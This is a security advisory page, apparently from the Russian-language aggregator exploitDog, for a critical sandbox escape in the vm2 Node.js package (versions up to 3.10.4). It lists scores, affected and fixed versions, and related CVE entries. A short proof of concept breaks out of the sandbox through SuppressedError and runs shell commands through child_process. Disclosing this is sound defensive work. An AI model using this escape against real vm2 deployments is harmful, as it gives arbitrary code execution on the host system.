Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-55hx-c926-fr95

Опубликовано: 05 мая 2026
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

VM2 Has a Sandbox Escape Issue via SuppressedError

In vm2 v3.10.4 on Node.js v24.13.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code.

PoC

const { VM } = require("vm2"); const vm = new VM(); vm.run(` const ds = new DisposableStack(); ds.defer(() => { throw null; }); ds.defer(() => { const e = Error(); e.name = Symbol(); e.stack; }); try { ds.dispose(); } catch(e) { const Function = e.suppressed.constructor.constructor; const process = new Function("return process;")(); const { execSync } = process.mainModule.require("node:child_process"); execSync("echo pwned", { stdio: "inherit" }); } `);

Пакеты

Наименование

vm2

npm
Затронутые версииВерсия исправления

<= 3.10.4

3.11.0

EPSS

Процентиль: 49%
0.0071
Низкий

9.8 Critical

CVSS3

Дефекты

CWE-693
CWE-94

Связанные уязвимости

CVSS3: 9.1
redhat
3 месяца назад

vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0.

CVSS3: 9.8
nvd
3 месяца назад

vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0.

CVSS3: 10
fstec
3 месяца назад

Уязвимость библиотеки vm2 пакетного менеджера NPM, связанная с неверным управлением генерацией кода, позволяющая нарушителю выполнить произвольный код

EPSS

Процентиль: 49%
0.0071
Низкий

9.8 Critical

CVSS3

Дефекты

CWE-693
CWE-94